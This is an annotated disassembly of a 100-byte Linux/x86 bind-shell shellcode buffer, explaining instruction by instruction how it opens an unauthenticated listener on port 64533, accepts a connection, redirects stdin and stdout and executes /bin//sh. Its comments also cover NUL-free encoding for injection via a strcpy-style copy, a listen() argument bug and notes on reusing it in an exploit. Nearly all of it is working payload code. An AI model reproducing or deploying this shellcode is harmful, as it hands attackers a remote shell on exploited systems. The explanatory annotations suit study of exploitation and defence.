# Payload Assembly Code -- annotated disassembly of the `shellcode` buffer.
#
# A Linux/x86 (32-bit, AT&T syntax) TCP *bind* shell, 100 bytes long. The
# left-hand addresses and <shellcode+N> offsets come from the disassembler
# dump and are not assembler input. Sequence of raw syscalls (all int $0x80):
#   socketcall(SYS_SOCKET, [AF_INET, SOCK_STREAM, 0])   -> listening fd in %esi
#   socketcall(SYS_BIND,   [fd, &sockaddr_in, 16])      -> 0.0.0.0:64533
#   socketcall(SYS_LISTEN, ...)                         -> see note at +50
#   socketcall(SYS_ACCEPT, [fd, NULL, NULL])            -> client fd in %ebx
#   dup2(client, 0); dup2(client, 1)                    -> stdin/stdout only
#   execve("/bin//sh", NULL, NULL)
# Register roles: %eax = syscall number / return value; %ebx = socketcall
# sub-call number, bumped with inc between calls (1 socket, 2 bind, 4 listen,
# 5 accept); %ecx = pointer to the argument array built on the stack;
# %edx = 0 (from cltd), reused wherever a 0 / NULL is needed; %esi = listening
# socket. No syscall return value is checked: a failure (negative -errno in
# %eax) is carried on as if it were a file descriptor.
# The odd idioms (push/pop instead of mov, cltd instead of xor %edx, mov %al
# instead of mov %eax, inc instead of add) are presumably chosen to keep the
# byte stream free of 0x00 so it survives a strcpy-style copy into the target
# buffer -- the listing itself does not prove that, so treat it as likely intent.
# Security properties to know before reusing this: the listener is
# unauthenticated and bound to every interface, the spawned shell inherits the
# credentials of the exploited process, and only fd 0 and fd 1 are redirected
# (stderr stays wherever the exploited process had it).
0x8049d60 <shellcode>: add $0x80,%esp # Raise %esp by 128 so the pushes below (stack grows down) do not land
# on top of this code; whether 128 bytes is enough depends on where the buffer sits relative to %esp on
# entry -- verify for the exploit this is used in.
0x8049d63 <shellcode+3>: push $0x66 # 0x66 = socketcall syscall number, parked on the stack for the pop below
0x8049d65 <shellcode+5>: push $0x1 # 1 = SYS_SOCKET (socketcall sub-call)
0x8049d67 <shellcode+7>: pop %ebx # %ebx = 1 (SYS_SOCKET) -- first argument of socketcall
0x8049d68 <shellcode+8>: pop %eax # %eax = 0x66 (socketcall)
0x8049d69 <shellcode+9>: cltd # %edx = sign-extension of %eax; 0x66 > 0 so %edx = 0 (NUL-free way to zero it)
0x8049d6a <shellcode+10>: push %edx # socket() arg[2]: protocol = 0
0x8049d6b <shellcode+11>: push $0x1 # socket() arg[1]: SOCK_STREAM
0x8049d6d <shellcode+13>: push $0x2 # socket() arg[0]: AF_INET (pushed last, so lowest in memory)
0x8049d6f <shellcode+15>: mov %esp,%ecx # %ecx = &args[0]; socketcall's second argument is a pointer to the arg array
0x8049d71 <shellcode+17>: int $0x80 # socketcall(SYS_SOCKET, [AF_INET, SOCK_STREAM, 0]); return value not checked
0x8049d73 <shellcode+19>: mov %eax,%esi # %esi = listening socket fd, kept for bind / listen / accept
0x8049d75 <shellcode+21>: push $0x66 # socketcall again
0x8049d77 <shellcode+23>: pop %eax # %eax = 0x66 (socketcall)
0x8049d78 <shellcode+24>: inc %ebx # %ebx = 2 = SYS_BIND. Next, build struct sockaddr_in on the stack, last field first:
0x8049d79 <shellcode+25>: push %edx # sin_addr = 0.0.0.0 (INADDR_ANY: accept connections on every interface)
0x8049d7a <shellcode+26>: pushw $0x15fc # sin_port in network byte order: bytes fc 15 -> port 0xfc15 = 64533
0x8049d7e <shellcode+30>: push %bx # sin_family = 2 (AF_INET) -- reuses the SYS_BIND value already in %bx
# Only 8 bytes were built; the 8 bytes of sin_zero that bind() will read (addrlen is 16) are whatever the
# socket() arg array left above on the stack. The kernel does not check sin_zero for AF_INET -- verify.
0x8049d80 <shellcode+32>: mov %esp,%ecx # %ecx = &sockaddr_in
0x8049d82 <shellcode+34>: push $0x10 # bind() arg[2]: addrlen = 16 = sizeof(struct sockaddr_in)
0x8049d84 <shellcode+36>: push %ecx # bind() arg[1]: &sockaddr_in
0x8049d85 <shellcode+37>: push %esi # bind() arg[0]: the listening socket
0x8049d86 <shellcode+38>: mov %esp,%ecx # %ecx = &args[0]
0x8049d88 <shellcode+40>: int $0x80 # socketcall(SYS_BIND, [fd, &addr, 16]); return value not checked
0x8049d8a <shellcode+42>: push $0x66 # socketcall again
0x8049d8c <shellcode+44>: pop %eax # %eax = 0x66 (socketcall)
0x8049d8d <shellcode+45>: inc %ebx # %ebx = 3 (SYS_CONNECT, skipped) ...
0x8049d8e <shellcode+46>: inc %ebx # ... %ebx = 4 = SYS_LISTEN
0x8049d8f <shellcode+47>: push $0x5 # intended listen() arg[1]: backlog = 5 ...
0x8049d91 <shellcode+49>: push %esi # ... and intended arg[0]: the listening fd -- but see the note below
# NOTE(review): %ecx is NOT reloaded from %esp before this int $0x80, so the kernel reads the bind() array
# that %ecx still points to: arg[0] = fd (same value, so it works) and arg[1] = &sockaddr_in used as the
# backlog. The two pushes above are dead stores. It succeeds in practice because the kernel clamps an
# oversized backlog (somaxconn) -- verify; a `mov %esp,%ecx` here would make the call intentional.
0x8049d92 <shellcode+50>: int $0x80 # socketcall(SYS_LISTEN, %ecx-array); return value not checked
0x8049d94 <shellcode+52>: push $0x66 # socketcall again
0x8049d96 <shellcode+54>: pop %eax # %eax = 0x66 (socketcall)
0x8049d97 <shellcode+55>: inc %ebx # %ebx = 5 = SYS_ACCEPT
0x8049d98 <shellcode+56>: push %edx # accept() arg[2]: addrlen = NULL
0x8049d99 <shellcode+57>: push %edx # accept() arg[1]: addr = NULL (peer address not wanted)
0x8049d9a <shellcode+58>: push %esi # accept() arg[0]: the listening fd
0x8049d9b <shellcode+59>: mov %esp,%ecx # %ecx = &args[0]
0x8049d9d <shellcode+61>: int $0x80 # socketcall(SYS_ACCEPT, [fd, NULL, NULL]); blocks until a client connects
0x8049d9f <shellcode+63>: mov %eax,%ebx # %ebx = connected client fd -- first argument of the dup2 calls below
0x8049da1 <shellcode+65>: push $0x3f # 0x3f = 63 = dup2 syscall number
0x8049da3 <shellcode+67>: pop %eax # %eax = 63 (dup2)
0x8049da4 <shellcode+68>: xor %ecx,%ecx # %ecx = 0 = target fd (stdin); this is a descriptor number, not a NULL pointer
0x8049da6 <shellcode+70>: int $0x80 # dup2(client, 0): the shell will read its input from the socket
0x8049da8 <shellcode+72>: push $0x3f # dup2 again
0x8049daa <shellcode+74>: pop %eax # %eax = 63 (dup2)
0x8049dab <shellcode+75>: inc %ecx # %ecx = 1 = stdout
0x8049dac <shellcode+76>: int $0x80 # dup2(client, 1): shell output goes to the socket. There is no dup2(client, 2):
# stderr is left untouched, so error messages from the shell never reach the client.
0x8049dae <shellcode+78>: xor %eax,%eax # %eax = 0: serves as string terminator, as argv, and as the base for %al below
0x8049db0 <shellcode+80>: push %eax # NUL terminator for the path string
0x8049db1 <shellcode+81>: push $0x68732f2f # "//sh" (little-endian); the doubled slash pads the path to 8 bytes without a NUL
0x8049db6 <shellcode+86>: push $0x6e69622f # "/bin" -- the stack now reads "/bin//sh\0"
0x8049dbb <shellcode+91>: mov %esp,%ebx # %ebx = filename = "/bin//sh" (execve arg[0])
0x8049dbd <shellcode+93>: cltd # %edx = sign-extension of %eax (0) = 0 -> envp = NULL (execve arg[2])
0x8049dbe <shellcode+94>: push %eax # push a 0 that the pop below turns into argv (the old comment was wrong: this is not the syscall number)
0x8049dbf <shellcode+95>: mov $0xb,%al # %eax = 11 = execve; only %al is written, the upper bytes are already 0 from the xor
0x8049dc1 <shellcode+97>: pop %ecx # %ecx = 0 -> argv = NULL (execve arg[1]); Linux accepts a NULL argv -- verify on the target kernel
0x8049dc2 <shellcode+98>: int $0x80 # execve("/bin//sh", NULL, NULL): replaces the process image; returns only on failure
0x8049dc4 <shellcode+100>: add %al,(%eax) # Not part of the payload: the disassembler decoding the two 0x00 bytes that follow the
# 100-byte shellcode (e.g. the buffer's terminating NUL). Never reached on success; if execve fails, execution
# falls through into it with a negative -errno in %eax and will most likely fault.